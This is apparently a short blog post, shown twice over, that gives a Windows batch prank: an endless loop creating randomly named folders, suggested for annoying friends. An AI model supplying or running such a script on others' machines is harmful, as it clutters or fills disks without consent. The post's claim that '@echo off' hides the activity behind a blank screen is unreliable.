Make over 1,000 folders in Seconds!
Make more than thousand folders in few seconds.!!
You can use this to annoy friends as he'll have to delete them or you can use for your benefit also!
So here it goes....
Open notepad and type :
@echo off
:top
md %random%
goto top
@echo off - makes it so that it appears to be a blank screen but actually its making hundreds of folder.
md %random% is command that creating folders with random names.
goto top – return to label :top, infinite loop
Save it as '' 1000folders.bat '' (commas excluded )
Make more than thousand folders in few seconds.!!
You can use this to annoy friends as he'll have to delete them or you can use for your benefit also!
So here it goes....
Open notepad and type :
@echo off
:top
md %random%
goto top
@echo off - makes it so that it appears to be a blank screen but actually its making hundreds of folder.
md %random% is command that creating folders with random names.
goto top – return to label :top, infinite loop
Save it as '' 1000folders.bat '' (commas excluded )
No comments:
Post a Comment